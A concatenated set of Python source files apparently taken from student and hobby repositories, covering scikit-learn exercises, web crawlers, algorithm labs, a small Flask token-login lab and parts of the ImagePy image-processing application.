# 对数据进行标准化
sc = StandardScaler()
x_data = sc.fit_transform(x_data)
return x_data, y_data
if __name__ == '__main__':
x_train_data, y_train_data = deal_train('data/Churn-Modelling.csv')
x_test, y_test = deal_train('data/Churn-Modelling-Test-Data.csv')
# 建模,可以多试试其他模型
lr = LogisticRegression()
lr.fit(x_train_data, y_train_data)
# 预测
pred = lr.predict(x_test)
print(classification_report(pred, y_test))
print(lr.score(x_test, y_test))
```
#### File: MathematicalModeling/test_data/Test.py
```python
import numpy as np
def calculate(a, b):
# 得到具体公式
g = -0.168 * a - 0.06 * b
L = 1 / (1 + pow(np.e, -g))
return L
def pred():
l = [51, 172, 43, 67, 193, 86, 198, 205, 97, 33]
l.sort()
print(l)
#
# index = [33, 43, 51, 67, 86, 97, 172, 193, 205]
# lay = []
# for i in range(0, 302):
# lay.append(0)
#
# for i in range(len(lay)):
# if i in index:
# lay[i] = 1
#
# print(lay)
# print(sum(lay))
# import matplotlib.pyplot as plt
#
# center = np.array([[-0.10124706, 0.25642006, - 0.09359024],
# [-0.23356946, - 0.30465014, 10.68487533],
# [7.34213732, - 0.26447147, - 0.09359024],
# [0.03852011, - 3.89985084, - 0.09359024]])
# colors = ['r', 'b', 'y', 'g']
# new_x_data = center[:, 0]
# new_y_data = center[:, 1]
# new_z_data = center[:, 2]
# ax = plt.figure().add_subplot(111, projection='3d')
# ax.scatter(new_x_data, new_y_data, new_z_data, c=colors, s=20)
# plt.show()
```
#### File: kaggle-project/TitanicPredict/predict_process.py
```python
import sys
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import BaggingClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report
import pandas as pd
# 先处理空缺的数据
def deal_train(train_data):
# 处理空缺的年龄,设为平均年龄
train_data['Age'] = train_data['Age'].fillna(train_data['Age'].median())
# print(train_data.describe())
# 处理性别,转化维0和1,loc是取数据的,里面传行,列
train_data.loc[train_data['Sex'] == 'male', 'Sex'] = 1
train_data.loc[train_data['Sex'] == 'female', 'Sex'] = 0
# print(train_data.loc[:, 'Sex'])
# 处理Embarked,登录港口
# print(train_data['Embarked'].unique()) # 看一下里面有几类
# 由于'S'比较多,就把空值用S填充
train_data['Embarked'] = train_data['Embarked'].fillna('S')
# 转化为数字
train_data.loc[train_data['Embarked'] == 'S', 'Embarked'] = 0
train_data.loc[train_data['Embarked'] == 'C', 'Embarked'] = 1
train_data.loc[train_data['Embarked'] == 'Q', 'Embarked'] = 2
'''接下来选取有用的特征'''
feature = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked']
x_data = train_data[feature]
y_data = train_data['Survived'] # 预测的标签
# 数据标准化
scaler = StandardScaler()
x_data = scaler.fit_transform(x_data)
return x_data, y_data
# 处理测试集数据
def deal_test(test_data, label_data):
# 填充年龄和Fare
test_data['Age'] = test_data['Age'].fillna(test_data['Age'].median())
test_data['Fare'] = test_data['Fare'].fillna(test_data['Fare'].median())
# 处理性别字符串为数值
test_data.loc[test_data['Sex'] == 'male', 'Sex'] = 1
test_data.loc[test_data['Sex'] == 'female', 'Sex'] = 0
# 处理登岸地点为数值
test_data.loc[test_data['Embarked'] == 'S', 'Embarked'] = 0
test_data.loc[test_data['Embarked'] == 'C', 'Embarked'] = 1
test_data.loc[test_data['Embarked'] == 'Q', 'Embarked'] = 2
# 接下来选取有用的特征'''
feature = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked']
x_data = test_data[feature]
y_data = label_data['Survived']
# 数据标准化
scaler = StandardScaler()
x_data = scaler.fit_transform(x_data)
return x_data, y_data
if __name__ == '__main__':
# 读入训练集和测试集
train_data = pd.read_csv('data/train.csv')
test_data = pd.read_csv('data/test.csv')
real_label_data = pd.read_csv('data/gender_submission.csv')
# 队训练集和测试集进行处理
x_train, y_train = deal_train(train_data)
x_test, y_test = deal_test(test_data, real_label_data)
# 建立模型
rf = RandomForestClassifier(n_estimators=10, max_depth=3, min_samples_split=4)
bagging = BaggingClassifier(rf, n_estimators=12)
bagging.fit(x_train, y_train)
# 预测
prediction = bagging.predict(x_test)
# 评估
print(bagging.score(x_test, y_test))
print((classification_report(prediction, y_test)))
# 保存预测结果为csv
submission = pd.DataFrame({
"PassengerId": test_data["PassengerId"],
"Survived": prediction
})
submission.to_csv('predict.csv', index=False)
``` |
{
"source": "JimouChen/machine-learning",
"score": 3
} |
#### File: machine_learning/practice/draw_heat_map.py
```python
import numpy as np
import pandas as pd
# 定义一个相关性的热力图,更加直观地判断
def heat_map(data):
import matplotlib.pyplot as plt
import seaborn as sns
plt.subplots(figsize=(data.shape[0], data.shape[1])) # 尺寸大小与data一样
correlation_mat = data.corr()
sns.heatmap(correlation_mat, annot=True, cbar=True, square=True, fmt='.2f', annot_kws={'size': 10})
plt.show()
data = pd.read_csv('data/wine.csv')
data = data.iloc[:, 1:] # 年份去掉
# 计算列与列之间的相关系数,返回相关系数矩阵,保留3位小数
print('相关系数矩阵:\n', np.round(data.corr(method='pearson'), 3))
# 作出相关性热力图
heat_map(data)
```
#### File: practice/exp/exp11.py
```python
from sklearn.linear_model import Lasso, LinearRegression, Ridge
from sklearn.datasets import make_regression
from sklearn.model_selection import train_test_split
import matplotlib.pyplot as plt
# 通过计算斜率和截距画拟合直线
def draw_line(model, color):
k = model.coef_
b = model.intercept_
line = k * x_data + b
plt.plot(x_data, line, color, 50)
plt.scatter(x_data, y_data, c='r')
plt.show()
# 获取表达式
def get_express(model):
k = '%.2f' % model.coef_[0]
b = model.intercept_
if b > 0:
b = '+' + '%.2f' % b
else:
b = '%.2f' % b
return 'y = ' + k + '*x' + b
if __name__ == '__main__':
# 产生一组数据, 加入噪点
x_data, y_data = make_regression(n_samples=200, noise=20, n_features=1, random_state=30)
x_train, x_test, y_train, y_test = train_test_split(x_data, y_data)
y_data = y_data.reshape(-1, 1)
# 线性回归
lr_model = LinearRegression()
lr_model.fit(x_train, y_train)
lr_prediction = lr_model.predict(x_test)
print('线性回归准确率:', lr_model.score(x_test, y_test))
print('线性回归的表达式是:', get_express(lr_model))
# 岭回归
rd_model = Ridge()
rd_model.fit(x_train, y_train)
rd_prediction = rd_model.predict(x_test)
print('岭回归准确率:', rd_model.score(x_test, y_test))
print('岭回归的表达式是:', get_express(rd_model))
# 套索回归
ls_model = Lasso()
ls_model.fit(x_train, y_train)
ls_prediction = ls_model.predict(x_test)
print('套索回归准确率:', ls_model.score(x_test, y_test))
print('套索回归的表达式是:', get_express(ls_model))
draw_line(lr_model, 'b')
draw_line(rd_model, 'y')
draw_line(ls_model, 'g')
```
#### File: practice/exp/exp22.py
```python
from sklearn.naive_bayes import GaussianNB, BernoulliNB
import pandas as pd
# 处理训练数据
def handle_data(data):
# 将非数值的特征转换为数值
data.loc[data['Outlook'] == 'Sunny', 'Outlook'] = 0
data.loc[data['Outlook'] == 'Overcast', 'Outlook'] = 1
data.loc[data['Outlook'] == 'Rain', 'Outlook'] = 2
data.loc[data['Temperature'] == 'Hot', 'Temperature'] = 0
data.loc[data['Temperature'] == 'Mild', 'Temperature'] = 1
data.loc[data['Temperature'] == 'Cool', 'Temperature'] = 2
data.loc[data['Humidity'] == 'High', 'Humidity'] = 0
data.loc[data['Humidity'] == 'Normal', 'Humidity'] = 1
data.loc[data['Wind'] == 'Weak', 'Wind'] = 0
data.loc[data['Wind'] == 'Strong', 'Wind'] = 1
# 处理标签,转化为数值
data.loc[data['PlayTennis'] == 'No', 'PlayTennis'] = 0
data.loc[data['PlayTennis'] == 'Yes', 'PlayTennis'] = 1
# 返回处理后的训练集和测试数据
x_data = data.iloc[:-1, 1:-1]
y_data = data.iloc[:-1, -1].astype('int')
x_test = data.iloc[-1, 1:-1].values.reshape(1, -1)
return x_data, y_data, x_test
if __name__ == '__main__':
my_data = pd.read_csv('data.csv')
x_data, y_data, x_test = handle_data(my_data)
# 建模拟合,这里使用高斯模型
gs_model = GaussianNB()
gs_model.fit(x_data, y_data.ravel())
print('高斯模型的准确率:', gs_model.score(x_data, y_data))
prediction = gs_model.predict(x_test)
print('预测的类别是:', prediction)
bnl_model = BernoulliNB()
bnl_model.fit(x_data, y_data.ravel())
print('伯努利模型的准确率:', bnl_model.score(x_data, y_data))
prediction = bnl_model.predict(x_test)
print('预测的类别是:', prediction)
if prediction == [0]:
print('经预测,结果为:不去打球')
else:
print('经预测,结果为:去打球')
```
#### File: practice/final_project/orl_face_recognition.py
```python
from PIL import Image
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
# 得到模型的评估指标,F1-分数,召回率,ROC曲线,PR曲线
from sklearn.metrics import classification_report, roc_curve, auc, f1_score, recall_score
class FaceRecognition:
# 初始化参数
def __init__(self, photo_path, save_file='data.txt'):
"""
:param photo_path: 图片路径
:param save_file: 将图片转化为二维数据的文件名
"""
self.path = photo_path
self.save_file = save_file
self.y_test = None
self.y_predict = None
self.model = None # 保存最终训练得到的模型
# 处理数据,将图片数据转化为二维矩阵
def handle_data(self):
# 标签列添加到矩阵的最后一列
label_list = []
# 将每一行的特征向量进行堆叠,最后得到(400,10305)大小的二维特征矩阵
stack_matrix = np.array([[0]])
for i in range(1, 41):
# 加入每张图片的标签
label_list.append(i)
class_matrix = np.array(label_list, ndmin=2)
for j in range(1, 11):
self.path = photo_path.format(i, j)
x = Image.open(self.path)
# 转换为narray的结构,并转为二维矩阵
data = np.reshape(np.asarray(x), (1, -1))
# print(x_data.shape) # 得到的维度是(1, 10304)
one_data = np.column_stack((data, class_matrix))
# 第一次不合并
if i == 1 and j == 1:
stack_matrix = one_data
continue
stack_matrix = np.row_stack((stack_matrix, one_data))
label_list.pop()
np.savetxt(self.save_file, stack_matrix)
# 加载读入数据
def load_data(self):
file = self.save_file
# 读入处理后的图片二维矩阵文件
train_data = np.loadtxt(file)
data = train_data[:, :10304] # 取出特征数据
target = train_data[:, -1] # 取出标签数据
return data, target
# 训练模型,返回准确率和模型,并打印出F1-分数和召回率等评估参数
def train_model(self, n_components=50, random_state=14):
"""
:param n_components: PCA降维的维度
:param random_state: 设置随机种子,调整后得到最佳模型
:return: 返回准确率和模型
"""
x_data, y_data = self.load_data()
x_train, x_test, y_train, self.y_test = train_test_split(x_data, y_data,
test_size=0.3,
random_state=random_state)
# 利用PCA将特征降至50维
pca = PCA(n_components=n_components)
x_train = pca.fit_transform(x_train)
self.model = SVC(kernel='rbf', C=10) # C是惩罚参数
self.model.fit(x_train, y_train)
# 利用在训练集上进行降维的PCA对测试数据进行降维,保证转换矩阵相同
x_test_pca = pca.transform(x_test)
self.y_predict = self.model.predict(x_test_pca)
score = self.model.score(x_test_pca, self.y_test)
print(classification_report(self.y_test, self.y_predict))
'''
测试其他算法实现人脸识别,以BP神经网络分类为例
from sklearn.neural_network import MLPClassifier
for i in range(450, 600, 10):
bp = MLPClassifier(hidden_layer_sizes=(500, 300),
max_iter=i,
solver='adam',
random_state=15)
bp.fit(x_train, y_train)
print('迭代{}次,使用BP神经网络在测试集上的准确率为:{}'.format(i, bp.score(x_test_pca, self.y_test)))
'''
return score, self.model
# 画ROC图
def draw_ROC(self):
fpr, tpr, thresholds = roc_curve(self.y_test, self.y_predict, pos_label=40)
roc_auc = auc(fpr, tpr)
plt.title('ROC')
plt.plot(fpr, tpr, 'b', label='AUC = %0.4f' % roc_auc)
plt.legend(loc='lower right')
plt.plot([0, 1], [0, 1], 'r--')
plt.ylabel('TPR')
plt.xlabel('FPR')
plt.show()
# 返回模型评估参数
def model_evaluation(self):
print('recall: %.4f' % recall_score(self.y_test, self.y_predict, average='micro'))
print('f1-score: %.4f' % f1_score(self.y_test, self.y_predict, average='micro'))
if __name__ == '__main__':
# 传入图片路径和需要保存的文件名
photo_path = './ORL/s{}_{}.bmp'
save_file = 'data.txt'
recognition = FaceRecognition(photo_path=photo_path, save_file=save_file)
# recognition.handle_data()
recognition.load_data()
acc, model = recognition.train_model(50, 14)
print('测试集上的预测准确率为:{}'.format(acc))
recognition.draw_ROC()
recognition.model_evaluation()
# 调参
# l = []
# for i in range(10, 30):
# print(i, end=': ')
# acc = recognition.train_model(random_state=i)
# if acc >= 0.983:
# l.append({i: acc})
#
# print(l)
``` |
{
"source": "JimouChen/python-application",
"score": 4
} |
#### File: Base/Thread/threading_test.py
```python
import threading
from time import sleep
# 继承线程类
class MyThread(threading.Thread):
def __init__(self, thread_name):
super().__init__()
self.thread_name = thread_name
def run(self):
print('thread start:' + self.getName() + '\t' + self.thread_name)
count = 5
while count:
sleep(1)
print(self.getName() + ' : count = %d' % count)
count -= 1
print('thread over...:' + self.getName())
thread_1 = MyThread('线程1')
thread_2 = MyThread('线程2')
thread_1.start()
thread_2.start()
thread_1.join()
thread_2.join()
```
#### File: PythonLearning/Base/yield.py
```python
def my_yield():
print('生成器被调用')
yield 1 # 第一次调用执行到这里结束,第二调用继续从下一句开始执行
yield 2
my_gen = my_yield() # 输出 生成器被调用
print(next(my_gen)) # 输出1
print(next(my_gen)) # 输出2
for i in my_yield():
print(i)
# -------------------------------------------------------
def fab(n):
a = 0
b = 1
while True:
if a < n:
a, b = b, a + b
yield a
else:
break
for each in fab(100):
print(each)
```
#### File: PythonLearning/ClassTest/test_inherit.py
```python
class Fish:
def __init__(self):
print('123456')
class Shark(Fish):
def __init__(self, name):
self.name = name
super().__init__()
def move(self, time):
self.time = time
print(self.name + ' is swimming for ' + str(self.time))
shark = Shark('skkk')
shark.move(5)
```
#### File: PythonLearning/Crawler/bs4_lgcrawler.py
```python
import requests
from bs4 import BeautifulSoup
import pandas as pd
# 获取网页源码
def get_html(url):
try:
res = requests.get(url, timeout=30)
res.encoding = 'gb2312' # 统一改成 GB 2312 编码
return res.text
except:
return ''
def parse_html(html):
soup = BeautifulSoup(html, 'lxml')
tr_list = soup.find_all('tr', attrs={"bgcolor": "#FFFFFF"})
# 保存所有房屋信息
houses = []
for tr in tr_list:
house = {}
# 详细地址
house["详细地址"] = tr.find_all('a',
attrs={"target": "_blank"})[0].string
# 详情链接
print(house["详细地址"])
house["详情链接"] = "http://www.lgfdcw.com/cs/" + \
tr.find_all('a', attrs={"target": "_blank"})[0].attrs["href"]
# 房型
house["房型"] = tr.find_all("td")[2].string
# 户型
house["户型"] = tr.find_all("td")[3].string
# 面积
house["面积"] = tr.find_all("td")[4].string[:-2] + "平方米"
# 出售价格
price = tr.find_all("td")[5].string
if price is not None:
house["出售价格"] = price.strip()
# 登记时间
house["登记时间"] = tr.find_all("td")[6].string
houses.append(house)
return houses
def save_file(dic):
# df = pd.DataFrame(dic, columns=["详细地址 ", "详情链接 ", "房型 ", " 户型 ", "面积 ", "出售价格 ", "登记时间 "])
# print(df)
df = pd.DataFrame(dic)
df.to_excel(r'D:/大学/软件工程/python数据分析与应用/pythonDataAnalysis/Test/house.xlsx')
def main():
# 抓取网页数据
html = get_html('http://www.lgfdcw.com/cs/index.php?PageNo=1')
# 解析网页数据
res = parse_html(html)
print(res)
# 保存到本地
save_file(res)
main()
```
#### File: PythonLearning/Crawler/crawl_book.py
```python
import requests
import re
import pandas
def get_html_text(url):
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
headers = {'User-Agent': user_agent}
# 发送请求
respond = requests.get(url=url, headers=headers)
respond.encoding = 'GBK'
html_text = respond.text
return html_text
def match_text(html_text):
# article = []
# 需要得到的内容,在 .+? 两边一定要加括号
pattern = re.compile(r'<p>(.+?)</p>')
msg = pattern.findall(html_text)[0]
# 得到文章标题
pattern2 = re.compile(r'<p id="bktitle">(.+?)</p>')
title = pattern2.findall(html_text)[0]
# article.append({'标题': title, '内容': msg})
# article.append(title)
# article.append(msg)
# return article
return title + '\n' + msg + '\n'
def next_url(html_text):
pattern = re.compile(r">下一篇:<a href='(.+?)'>第")
next_page = pattern.findall(html_text)
return next_page
if __name__ == '__main__':
all_content = []
url = 'http://www.newxue.com/baike/12454027234683.html'
# html_text = get_html_text(url)
# massage = match_text(html_text)
# 保存成txt
file = open('SGYY_book.txt', 'w')
while url:
try:
html_text = get_html_text(url)
massage = match_text(html_text)
print(massage)
file.write(massage)
all_content.append(massage)
url = next_url(html_text)[0]
except Exception:
print('爬取完毕')
break
print(all_content)
# save = pandas.DataFrame(all_content)
# save.to_excel('SGYY_book.xls')
file.close()
```
#### File: Design and Analysis of Algorithms/lab/lab1.py
```python
num = [0 for i in range(100)]
temp = [0 for i in range(100)]
count = 0
def merge(low, high, mid):
left = low # 左边数组指针
right = mid + 1 # 右边数组指针
k = low # temp数组指针
global count
while left <= mid and right <= high:
if num[left] > num[right]:
temp[k] = num[right]
k += 1
right += 1
# 求逆序对
count += mid - left + 1
else:
temp[k] = num[left]
k += 1
left += 1
# 检测左边
while left <= mid:
temp[k] = num[left]
k += 1
left += 1
# 检查右边
while right <= high:
temp[k] = num[right]
k += 1
right += 1
# 拷贝
for i in range(low, high + 1):
num[i] = temp[i]
def merge_sort(low, high):
if low >= high:
return
# 分
mid = (high + low) // 2
# mid = low + (high - low) // 2
merge_sort(low, mid)
merge_sort(mid + 1, high)
# 治
merge(low, high, mid)
if __name__ == '__main__':
# array = [3, 5, 2, 4, 6]
# 输入
num = list(map(int, input().split()))
merge_sort(0, len(num) - 1)
print(count)
'''
3 5 2 4 6
3
'''
```
#### File: Design and Analysis of Algorithms/lab/lab6.py
```python
class Node:
def __init__(self, pos, val, weight, path):
self.pos = pos
self.val = val
self.weight = weight
self.path = path # 记录供应商
value = [[0 for _ in range(100)] for _ in range(100)]
weight = [[0 for _ in range(100)] for _ in range(100)]
Max = 99999999
res = Node(0, Max, Max, '') # 先把最小结果设为最大
def bfs():
global res
queue = [Node(1, 0, 0, '')]
while len(queue):
temp_node = queue[0]
queue.pop(0)
p, v, w = temp_node.pos, temp_node.val, temp_node.weight
if p == n + 1:
if (temp_node.weight < res.weight) or (temp_node.weight == res.weight) and (temp_node.val < res.val):
res = temp_node
continue
for i in range(1, m + 1):
new_val = v + value[p][i]
new_weight = w + weight[p][i]
if (new_val > d) or (new_weight > res.weight):
continue
queue.append(Node(p + 1, new_val, new_weight, temp_node.path + str(i)))
if __name__ == '__main__':
# 部件个数,供应商个数,及最大的总价格
print('请分别输入部件个数,供应商个数,及最大的总价格:')
n, m, d = map(int, input().split())
# 各个部件在各个供应商处购买的价格
print('请输入各个部件在各个供应商处购买的价格:')
for i in range(1, n + 1):
temp_list = list(map(int, input().split()))
for j in range(1, m + 1):
value[i][j] = temp_list[j - 1]
# 各个部件在各个供应商处购买的重量
print('请输入各个部件在各个供应商处购买的重量:')
for i in range(1, n + 1):
temp_list = list(map(int, input().split()))
for j in range(1, m + 1):
weight[i][j] = temp_list[j - 1]
bfs()
print('最小总重量:', res.weight)
print('零件1、2、3、4来自对应的供应商是:')
for i in res.path:
print(i)
'''
4 3 28
9 7 5
10 8 7
5 8 9
4 7 5
3 2 1
2 1 1
1 2 2
1 2 2
3 3 4
1 2 3
3 2 1
2 2 2
1 2 3
3 2 1
2 2 2
请分别输入部件个数,供应商个数,及最大的总价格:
4 3 21
请输入各个部件在各个供应商处购买的价格:
4 5 6
1 2 3
4 4 6
2 1 3
请输入各个部件在各个供应商处购买的重量:
3 4 5
5 3 2
1 2 3
1 9 2
最小总重量: 7
'''
```
#### File: Design and Analysis of Algorithms/week2/Q2_4.py
```python
def T(n):
if n == 1:
return 4
elif n > 1:
return 3 * T(n - 1)
def T(n):
if n == 1:
return 1
elif n > 1:
return 2 * T(n // 3) + n
print(T(5))
```
#### File: OJ/competition/A.py
```python
import math
def f(n):
if n == 1:
return 1
sum1 = 0
for i in range(1, n):
sum1 += (math.gcd(i, n - i) == 1)
return sum1 % 1000000007
def g(n):
sum1 = 0
for i in range(1, n + 1):
if n % i == 0:
sum1 += f(n // i)
return sum1 % 1000000007
def G(n, k):
if k == 1:
return f(g(n)) % 1000000007
elif k > 1 and k % 2 == 0:
return g(G(n, k - 1)) % 1000000007
elif k > 1 and k % 2 == 1:
return f(G(n, k - 1)) % 1000000007
t = int(input())
a = 1
while t:
n, k = map(int, input().split())
print(G(n % 1000000007, k % 1000000007))
t -= 1
```
#### File: PythonLearning/OJ/Joseph.py
```python
def joseph_by_array(n, m):
a = [0 for _ in range(n + 1)]
cnt = 0 # 目前出局的人数
i, k = 0, 0 # a[i]是报数的人,k是报的数,从1开始数
while cnt != n:
i += 1
if i > n:
i = 1
if a[i] == 0:
k += 1
if k == m:
a[i] = 1
cnt += 1
print(i, end=" ")
k = 0 # 重新从1开始报数
# 索引法remove_index = (remove_index + m - 1) % len(number)
def joseph_by_index(n, m):
number = [_ for _ in range(1, n + 1)]
out_index = 0
while len(number):
out_index = (out_index + m - 1) % len(number)
print(number[out_index], end=" ")
number.remove(number[out_index])
# 公式法公式法更快:f(n, m) = (f(n - 1, m) + m) mod n
if __name__ == '__main__':
person_num, out_num = map(int, input().split())
joseph_by_array(person_num, out_num)
print()
joseph_by_index(person_num, out_num)
```
#### File: OJ/test_all/test_task.py
```python
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
p = head
all_val = []
while p:
q = ListNode(0)
q.val = p.val
all_val.append(q)
p = p.next
all_val.remove(all_val[len(all_val) - n])
if len(all_val) == 0:
return None
for i in range(len(all_val) - 1):
all_val[i].next = all_val[i + 1]
return all_val[0]
a = Solution()
t1 = ListNode(1)
t2 = ListNode(2)
# t3 = ListNode(3)
# t4 = ListNode(4)
# t5 = ListNode(5)
t1.next = t2
# t2.next = t3
# t3.next = t4
# t4.next = t5
a.removeNthFromEnd(t1, 1)
```
#### File: FlaskProject/testlab/lab5.py
```python
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from flask import Flask, jsonify, request, abort
from requests import Session
from sqlalchemy.orm import sessionmaker
engine = create_engine('sqlite:///rest1.db')
Base = declarative_base()
app = Flask('test_app')
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
name = Column(String)
password = Column(String)
token = Column(String)
# 注册
@app.route("/register/", methods=('POST',))
def user_create():
name = request.form.get('name')
password = request.form.<PASSWORD>('password')
token = request.form.get('token')
if name and password and token:
session = Session()
user = User(name=name, password=password, token=token)
session.add(user)
session.commit()
return jsonify({
'status': 201,
'data': {
'id': user.id,
'name': user.name
}
})
else:
abort(401)
# 登录
@app.route('/login/', methods=('GET',))
def login():
name = request.form.get('name')
password = request.form.get('password')
token = request.form.get('token')
for i in Session().query(User):
if name == i.name and password == <PASSWORD>:
# 更换token
user = session.query(User).filter(User.name.like(name)).first()
user.token = token
session.commit()
return jsonify({
'status': 200,
'data': {
'id': i.id,
'token': i.token
}
})
# 验证登录
@app.route("/judge/", methods=('GET',))
def judge():
token = request.form.get('token')
id_ = request.form.get('id')
if token and id_:
for i in Session().query(User):
# 判断token和id是否一样
if i.token == token and str(i.id) == id_:
return jsonify({
'status': 200
})
# token或者id不对或者输入为空的情况登陆失败
return jsonify({
'status': 401
})
# PUT登出
@app.route('/put/', methods=('PUT',))
def delete():
token = request.form.get('token')
name = request.form.get('name')
if token and name:
for i in Session().query(User):
# 判断token和name是否一样,一样就把该token删除
if i.token == token and i.name == name:
user = session.query(User).filter(User.id.like(i.id)).first()
# session.delete(user)
user.token = ''
session.commit()
return jsonify({
'status': 204
})
if __name__ == '__main__':
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
app.run()
```
#### File: FlaskProject/testlab/test.py
```python
from flask import Flask, jsonify
app = Flask('test_app')
@app.route('/')
def hello():
return jsonify({
'hello': 'world'
})
@app.route('/<string:name>/')
def test(name: str = None):
local_ver = []
for i in range(len(name)):
local_ver.append(i * '*+')
return jsonify({
'hello ya': name,
'local': local_ver
})
if __name__ == '__main__':
app.run()
```
#### File: testScrapy/spiders/douban_comment.py
```python
import scrapy
from bs4 import BeautifulSoup
from testScrapy.items import TestscrapyItem
class CommentSpider(scrapy.Spider):
name = 'comment_spider'
start_urls = ['https://book.douban.com/subject/35092383/annotation']
custom_settings = {
"USER_AGENT": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36',
}
page_num = 1
def parse(self, response, **kwargs):
soup = BeautifulSoup(response.body, 'html.parser')
nodes = soup.find_all('div', {'class': 'short'})
print('======================{}======================'.format(self.page_num))
for node in nodes:
comment = node.find('span').text
# 保存
item = TestscrapyItem(page_num = self.page_num, comment=comment)
yield item
# print(comment, end='\n\n')
self.page_num += 1
# 其他页链接
num = 10 * self.page_num
if self.page_num <= 28:
url = 'https://book.douban.com/subject/35092383/annotation?sort=rank&start=' + str(num)
yield scrapy.Request(url, callback=self.parse)
#
# print('保存完毕')
```
#### File: lab3/spiders/spider_msg.py
```python
import scrapy
from bs4 import BeautifulSoup
from lab3.items import Lab3Item
class QuoteSpider(scrapy.Spider):
name = 'quotes'
start_urls = ['http://quotes.toscrape.com/page/1/']
page_num = 1
# 对爬取到的信息进行解析
def parse(self, response, **kwargs):
soup = BeautifulSoup(response.body, 'html.parser')
nodes = soup.find_all('div', {'class': 'quote'})
for node in nodes:
text = node.find('span', {'class': 'text'}).text
author = node.find('small', {'class': 'author'}).text
tags = node.find_all('a', {'class': 'tag'})
tags_list = []
for tag in tags:
tags_list.append(tag.text)
# 接下来找作者链接,进去爬取里面的信息
author_link = 'http://quotes.toscrape.com/' + node.find_all('span')[1].a['href']
# 抛给author_parse进行处理
yield response.follow(author_link, self.author_parse)
# print('{0:<4}:{1:<20} said:{2:<20}\n{3}'.format(self.page_num, author, text, tags_list))
item = Lab3Item(author=author, text=text, tags=tags_list)
yield item
print('=' * 80 + 'page:',self.page_num,'saved successfully!' + '=' * 80)
# 下面爬取下一页的链接
try:
self.page_num += 1
url = soup.find('li', {'class': 'next'}).a['href']
if url:
next_link = 'http://quotes.toscrape.com/' + url
yield scrapy.Request(next_link, callback=self.parse)
except Exception:
print('所有页面信息爬取结束!!!')
def author_parse(self, response, **kwargs):
soup = BeautifulSoup(response.body, 'html.parser')
author_name = soup.find_all('div', {'class': 'author-details'})[0].find('h3').text
birthday = soup.find('span').text
bio = soup.find('div', {'class': 'author-description'}).text
# print('{}: {}\n{}\n{}\n'.format(self.page_num, author_name, birthday, bio))
item = Lab3Item(name=author_name, birthday=birthday, bio=bio)
yield item
```
#### File: python-application/TestExample/test_.py
```python
z = [0.60553896,-0.22906616,1.86852386]
print(sum(z))
``` |
{
"source": "jimpassmore/imagepy",
"score": 2
} |
#### File: core/roi/roi.py
```python
from .convert import roi2shape, shape2roi
def affine(body, m, o):
if isinstance(body, list):
return [affine(i, m, o) for i in body]
if isinstance(body, tuple):
return tuple(m.dot(body)+o)
class ROI:
def __init__(self):pass
def buffer(self, r):
return shape2roi(roi2shape(self).buffer(r, 4))
def convex(self):
return shape2roi(roi2shape(self).convex_hull)
def bounds(self):
from .rectangleroi import RectangleRoi
box = roi2shape(self).bounds
return RectangleRoi(*box)
def clip(self, rect):
return shape2roi(roi2shape(rect).intersection(roi2shape(self)))
def invert(self, rect):
return shape2roi(roi2shape(rect).difference(roi2shape(self)))
def union(self, roi):
return shape2roi(roi2shape(roi).union(roi2shape(self)))
def diff(self, roi):
return shape2roi(roi2shape(self).difference(roi2shape(roi)))
```
#### File: imagepy/imagepy/IPy.py
```python
from __future__ import absolute_import
from __future__ import print_function
import wx, os
from wx.lib.pubsub import pub
from .core import manager
from .imageplus import ImagePlus
from . import root_dir
curapp = None
def get_window():
return manager.WindowsManager.get()
def get_ips():
win = manager.WindowsManager.get()
return None if win==None else win.canvas.ips
def showips(ips):
from .ui.canvasframe import CanvasFrame
frame = CanvasFrame(curapp)
frame.set_ips(ips)
frame.Show()
pub.subscribe(showips, 'showips')
def show_ips(ips):
wx.CallAfter(pub.sendMessage, 'showips', ips=ips)
def showimg(imgs, title):
print('show img')
ips = ImagePlus(imgs, title)
showips(ips)
pub.subscribe(showimg, 'showimg')
def show_img(imgs, title):
wx.CallAfter(pub.sendMessage, 'showimg', imgs=imgs, title=title)
print('mes show img')
'''
def stepmacros(macros):
macros.next()
pub.subscribe(stepmacros, 'stepmacros')
def step_macros(macros):
wx.CallAfter(pub.sendMessage, "stepmacros", macros=macros)
'''
def alert(info, title="ImagePy Alert!"):
dlg=wx.MessageDialog(curapp, info, title, wx.OK)
dlg.ShowModal()
dlg.Destroy()
# MT alert = lambda info, title='image-py':callafter(alert_, *(info, title))
def yes_no(info, title="ImagePy Yes-No ?!"):
dlg = wx.MessageDialog(curapp, info, title, wx.YES_NO | wx.CANCEL)
rst = dlg.ShowModal()
dlg.Destroy()
dic = {wx.ID_YES:'yes', wx.ID_NO:'no', wx.ID_CANCEL:'cancel'}
return dic[rst]
def getpath(title, filt, k, para=None):
"""Get the defaultpath of the ImagePy"""
dpath = manager.ConfigManager.get('defaultpath')
if dpath ==None:
dpath = root_dir # './'
dic = {'open':wx.FD_OPEN, 'save':wx.FD_SAVE}
dialog = wx.FileDialog(curapp, title, dpath, '', filt, dic[k])
rst = dialog.ShowModal()
path = None
if rst == wx.ID_OK:
path = dialog.GetPath()
dpath = os.path.split(path)[0]
manager.ConfigManager.set('defaultpath', dpath)
if para!=None:para['path'] = path
dialog.Destroy()
return rst if para!=None else path
def getdir(title, filt, para=None):
dpath = manager.ConfigManager.get('defaultpath')
if dpath ==None:
dpath = root_dir
dialog = wx.DirDialog(curapp, title, dpath )
rst = dialog.ShowModal()
path = None
if rst == wx.ID_OK:
path = dialog.GetPath()
if para!=None:para['path'] = path
